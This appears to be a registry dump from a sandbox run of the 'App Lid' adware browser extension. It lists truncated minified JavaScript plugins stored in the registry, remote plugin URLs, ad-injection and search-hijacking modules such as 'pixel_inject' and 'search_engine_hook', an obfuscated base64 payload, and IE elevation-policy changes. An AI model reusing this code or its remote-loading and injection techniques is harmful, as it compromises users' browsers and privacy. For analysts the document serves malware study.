    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActiÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
    "Version" = "5"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\38]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberOÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/253.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\94]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/94.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/242.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/13.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[252]=function(){var f=function(m,n,l,k){while(l.length
    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "Version" = "21"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
    "Version" = "5"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
    "JavaScript" = "(function(a){appAPI.queueManager={queue:[],register:function(b){this.queue.push(b);}};appAPI.ready=function(c,b){a.when.apply(null,appAPI.queueManager.queue).then(function(){a.when(appAPI.initializerPlugin.isReady(b)).then(function(){new Function('if (typeof jQuery === undefined) { jQuery = $jquery_171; }(' appAPI.resources.parseIncludeJS(c.toString()) )($jquery_171))();});});};}($jquery_171));var CrossRiderResourcesManager=(function(z){var B={appId:appAPI._cr_config.appID(),url:appAPI._cr_config.resources,env:appAPI.appInfo.environment===staging?staging:production,saveResource:appAPI.time.daysFromNow(90),nextCheck:360,DBNamespace:Resources_,isDebug:appAPI.debugManager.isDebug()&&appAPI.debugManager.getResourcesPath(),isIE7:z.browser.msie&&z.browser.version*1==7},x=new z.Deferred(),h=K(meta)||{},D=K(remote_resources)||{remoteId:0},e=K(queue)||{},g=initialVersion=K(lastVersion)||0;return z.Class.extend({init:function(){appAPI.queueManager.register(x.promise());if(B.isDebug){x.resolve();}elÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\7]
    "JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins]
    "PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\262]
    "Name" = "pops_5_j_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\200]
    "Version" = "4"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\64]
    "Name" = "appApiMessage"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
    "Name" = "pluginsVerticals"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\252]
    "Version" = "10"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
    "Name" = "imonomy_m"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
    "AppName" = "App Lid-bg.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\246]
    "Name" = "setup"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
    "WpadNetworkName" = "Network"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "ChangePrevious" = "false"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
    "Name" = "ie8_fix_2"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
    "AppName" = "App Lid-buttonutil.exe"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "srcid" = "000820"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDetectedUrl" = ""

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\234]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/234.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "UninstallerOfferAction" = "NA"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\182]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/182.js"

    [HKCU\Software\AppDataLow\Software\Crossrider]
    "Bic" = "AC5F59911E7B4F9F831F542369865C6AIE"

    [HKLM\System\CurrentControlSet\Control\Session Manager]
    "PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\PUPautoinsaller_v1.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\31ec1c24\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\python.dll, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VMwareDnD\6c88b866\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\biclient.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\422.json, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images\code, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\images, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\422.db, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\STab_Down_6.0.6.6.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\wpm_v20.0.0.1714.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp\XTab_v4.0.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876\tmp, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Wtmp3160876, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\,"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
    "JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length<=c.maxlength){e(f,g);}});};})(appAPI);(function(b){var c=functiÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\47]
    "JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
    "JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[221]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(221,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:DOWNLOADS}))();};"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}if(typeof appAPI.internal.message===undefined){appAPI.internal.message={};}appAPI.internal.message.send=function(b){if(typeof b!==object){return false;}if(typeof b.eventName!==string){return false;}b.senderTabId=appAPI.tabId;var c;try{c=appAPI.JSON.stringify(b);}catch(a){console.error(appAPI.message error - Caught a JSON exception when trying to stringify the message);return false;}if(typeof c!==string){console.error(appAPI.message error - Failed to stringify message);return false;}if(c.length>8192){console.error(appAPI.message error - can't send message because content is too long: c.length);return false;}appAPIinternal.msgToAllTabs(c);return true;};appAPI.internal.callbacks.crossBhoEvent=function(b){if(typeof b.msgObj!==string){return;}try{b=appAPI.JSON.parse(b.msgObj);}catch(c){console.error(Failed to parsÅ–"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\App Lid]
    "DisplayName" = "App Lid"

    [HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{a96c2976-ee5b-4f1e-824c-c00fd74dd873}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
    "Version" = "4"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
    "Name" = "IEBrowserEvents"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\301]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/301.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\253]
    "Name" = "pixel_inject"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
    "Version" = "2"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/35.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
    "JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;Å–"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/223.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\13]
    "Name" = "CrossriderAppUtils"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
    "Name" = "monetizationLoader.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\17]
    "JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^<]*(<[\w\W] >)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^<(\w )\s*\/?>(?:<\/\1>)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\4]
    "Name" = "jquery_1_7_1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\39]
    "Name" = "IEDatabase"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "FullVersionForUrl" = "1_36_01_22"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
    "App Lid-bg.exe" = "8000"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "AutoDetect" = "1"

    [HKLM\SOFTWARE\Wow6432Node\App Lid\Installer]
    "BundledIe" = "1"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\221]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/221.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/37.js"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0940d92d-eb5b-4a66-a360-ea4a14653723}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
    "Verifier" = "705e42e0bb6c74a04369956d99485df5"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\223]
    "Version" = "9"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
    "UNCAsIntranet" = "0"

    [HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
    "Policy" = "1"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{70c7f9ab-103c-416a-a8bf-5b70c1c0831b}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\220]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/220.js"

    [HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{48a0739a-6b32-4042-aabe-9d8d05cc8dc3}]
    "AppPath" = "%Program Files% (x86)\App Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\242]
    "Name" = "price_gong_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/42.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\102]
    "Version" = "11"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "AddressbarURL" = "NA"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\177]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/177.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\180]
    "Name" = "bpo_serp_m"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/3.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\22]
    "Version" = "6"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\37]
    "JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.browserEventCode=true;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;appAPI.internal.callbacks.setEventHandler(openURL,function(b){if(appAPI.isActiveTab()){var a={url:b.url,where:b.where,focus:(typeof b.focus===boolean?b.focus:true),height:(typeof b.height===number?b.height:750),width:(typeof b.width===number?b.width:750),top:(typeof b.top===number?b.top:100),left:(typeof b.left===number?b.left:100),focusTimer:(typeof b.focusTimer===number?b.focusTimer:0),focusDelay:(typeof b.focusDelay===number?b.focusDelay:0)};appAPI.Å–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
    "Name" = "IEInternal"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi֐Ŗ"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "PluginsManifestVersion" = "17"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "FullVersion" = "1.36.01.22"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\183]
    "Version" = "4"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "ThanksUrl" = "NA"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins]
    "BrowserEventPluginList" = "14,42,41,44,39,38,43,37,64,72"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
    "JavaScript" = "if(appAPI.__should_activate_validation__===true){(function(){var e={WRONG_STRICT_VALUE:Parameter %PARAM_NAME% value is not supported.,WRONG_TYPE:Parameter %PARAM_NAME% is of wrong type. Valid types: [%VALID_TYPES%].,PARAM_IS_MANDATORY:Parameter %PARAM_NAME% is mandatory.,DB_VAL_TOO_LARGE:appAPI.db storage is limited to 1000 bytes per key. For larger values please use appAPI.db.async};var a=function(m){return m.charAt(0).toUpperCase() m.slice(1);};var h={};var b=appAPI.appInfo.name;var i=function(o,r,q,p){if(typeof p===undefined){p=;}var n=[ new Date().toDateString() new Date().toLocaleTimeString() ] b;var m=;if(typeof console!==undefined){if((q===e.DB_VAL_TOO_LARGE)&&(typeof console.warn===function)){console.warn(n m);}else{if(typeof console.error===function){console.error(n m);}else{if(typeof console.log===function){console.log(n m);}}}}return;};var l=function(p,n,o){var m=pÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\345]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/345.js"

    [HKLM\SOFTWARE\Wow6432Node\AppDataLow\Software\Crossrider]
    "Bic" = "AC5F59911E7B4F9F831F542369865C6AIE"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\9]
    "Name" = "search_engine_hook"

    [HKCU\Software\AppDataLow\Software\App Lid\Installer]
    "ErrorsDomain" = "http://errors.ourclientinputsrv.com"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\1]
    "Name" = "base"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\43]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/43.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
    "Name" = "CrossriderInfo"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "PublisherName" = "Lid"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\255]
    "JavaScript" = "if (typeof setup2 === 'function') { setup2('MTY3ZTdlNGExOTAwMTAwNzI3MTAwMTU2NGQ0ODUzMWMxMDAzMDI1ODQyNWIxNjQ2MDUxMjFjMWUwMzRjMGUxYjFhNDcxMDVhMTQxZjAyNWQ1YjQ2NDExYTE0MTI1NjRhMmQzZDJlMjYzODNiMjIyNjJkMzMzNzMwMzIzMTJmM2MzNDNhMjAzMjM2M2QzZTIxMzUzNzM4MzAzYjI4NTQ1NDVmNDIzOTA5MWMxMTU5MjgyZDIxM2YzYjI0M2IyMzNkMjAzMjIwM2QyYzI0MjczNzNmMzUyOTMyMmQzZDRiNDI0NTVlMDMxMTAyNDQ0ZjNkMzIzNzI1MjcyMjI3MzYzZTM2MjczZjJiMjIzYjM0MjYzYjNlMzYzZDMyNTI0MTVhNDcwNjAxMTE0MzVmNWI0NzQwNWE0NzEyNTM0NDQ1NTE1YTQ2NDE1MTQ3NDA1MjQyNDU1MDRiMDAwNDFiMTgxMDU5NDY1NDE2MDgxZDEzNTUyZTJiMjcyNTNkMzEzZTI2M2UyYzM0MjYzYjM2MjIzMjMyM2QzMzM3MmU1MjEwMDIxYjA2NTAyYjI4MmIyMzNiMzcyNDIwMmIyOTMxMjUzNzM4M2EzNzIzMzMyZTIxMzEyNTM3MjQyNzIxMjUyZDJiMjkyYjI4NGE1ZDdlNmQ1NTFhMTYxOTA0MDQzZDAzMTg0NjRkNTI0MDA1MDAwMzE4MDI0ZTRiNTgxMzRjMTkxMjBmMDEwMDVhMDcxODFmNGQwYzVhMDcwMDAxNGI1MjQ1NDQxMDA4MTI0NTU1MmUyYjI3MjUzZDMxM2UyNjNlMmMzNDI2M2IzMjJhMzYyODNhMzMyZDM1MmIzNzIyMzAzZDI0MzAyODM3NTc0MjU2NDEzYzAzMDAxMTRhMzcyZTM3MzYzODIxMzEzZjNkMzMyZDIzMmIyNTI3MjIzZDIzMzUzYTJkMmUyYjQyNDE0MDU0MWYxMTExNWI0YzJiM2I"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "ModeType" = "production"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\78]
    "JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)<0&&/(mozilla)(?:.*? rv:([\w.] )|)/.exec(h)||[];var f=/(ipad)/.exec(h)||/(iphone)/.exec(h)||/(android)/.exec(h)||/(windows)/.exec(h)||/(mac)/.exec(h)||/(linux)/.exec(h)||/(ubuntu)/.exec(h)||[];return{browser:g[1]||,version:g[2]||0,platform:f[0]||};};a=d.uaMatch(c.navigator.userAgent);b={};if(a.browser){b[a.browser]=true;b.name=(b.rv?msie:a.browser);b.version=a.version;}if(a.platform){b[a.platform]=true;b.os=(a.platform===windows?win:a.platform);}if(b.chrome||b.opr){b.webkit=true;}else{if(b.webkit){b.safari=true;}}if(b.rv){bÅ–"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\35]
    "Name" = "IEAjax"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
    "WpadDecisionReason" = "1"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
    "SavedLegacySettings" = "46 00 00 00 47 00 00 00 09 00 00 00 00 00 00 00"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\3]
    "JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\72]
    "URL" = "http://js.ourclientinputsrv.com/plugins/mins/72.js"

    [HKCU\Software\AppDataLow\Software\App Lid\Update]
    "LastCheck" = "1422513845"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\42]
    "Version" = "10"

    [HKCU\Software\AppDataLow\Software\App Lid\Manifest]
    "IsButtonEnabled" = "true"
    "PublisherId" = "25286"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\91]
    "Version" = "121"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\41]
    "JavaScript" = "if(typeof appAPI===""undefined""){appAPI={};}(function(a){appAPI.isBackground=false;appAPI.tabId=a.getBhoInstanceId();appAPI.getTabId=function(){return appAPI.tabId;};appAPI.isActiveTab=function(){return appAPIinternal.isActiveTab();};appAPI.platform=""IE"";if(typeof appAPI.appInfo===""undefined""){appAPI.appInfo={};}var c=appAPI.internal.prefs.getChar(""fullVersionForUrl""

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\14]
    "Version" = "11"

    [HKCU\Software\AppDataLow\Software\App Lid\Plugins\207]
    "JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=$jquery_171;function c(f){return true;}function b(g,f){f=appAPI.utils.isFunction(f)?f:c;return d.map(g,function(h){return f(h)?h:null;});}function a(f){f.getList=(function(){var g=f.getList;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.getKeys=(function(){var g=f.getKeys;return function(h){h=h||{};return b(g.call(f),h.predicate);};}());f.removeAll=(function(){var g=f.removeAll;return function(h){if(!appAPI.utils.isObject(h)){return g.call(f);}d.each(f.getList(h),function(j,k){f.remove(k.key);});};}());}function e(g){g.getList=(function(){var h=g.getList;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callback)){return;}h.call(g,function(j){i.callback(b(j,i.predicate));});};}());g.getKeys=(function(){var h=g.getKeys;return function(i){if(appAPI.utils.isFunction(i)){return h.call(g,i);}if(!appAPI.utils.isObject(i)||!appAPI.utils.isFunction(i.callbacRÅ–"

